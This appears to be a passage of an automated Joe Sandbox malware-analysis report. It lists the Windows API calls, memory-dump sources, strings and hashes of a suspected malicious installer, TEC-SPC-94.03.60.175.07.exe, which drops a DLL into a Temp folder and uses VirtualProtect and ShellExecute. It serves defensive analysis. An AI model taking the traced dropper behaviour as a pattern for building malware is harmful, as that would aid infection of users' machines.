                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          APIs
                                                          • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: PrivateProfileString
                                                          • String ID:
                                                          • API String ID: 1096422788-0
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          APIs
                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          APIs
                                                          • SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          APIs
                                                          • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                          • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                          • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                          • DeleteObject.GDI32(00000000), ref: 00404C64
                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                          • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                          • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                          • ShowWindow.USER32(00000000), ref: 0040514F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                          • API String ID: 2246997448-4037518227
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                          • GetSysColor.USER32(?), ref: 00404417
                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: Call$N$open
                                                          • API String ID: 3615053054-2563687911
                                                          APIs
                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                            • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                          • wsprintfA.USER32 ref: 00405CDE
                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Strings
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                          • API String ID: 1265525490-899692902
                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          Strings
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3963005831
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll
                                                          • API String ID: 1453599865-3208193370
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                          • String ID:
                                                          • API String ID: 3294113728-0
                                                          • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                          • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                          • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(00026166,00000064,00029799), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
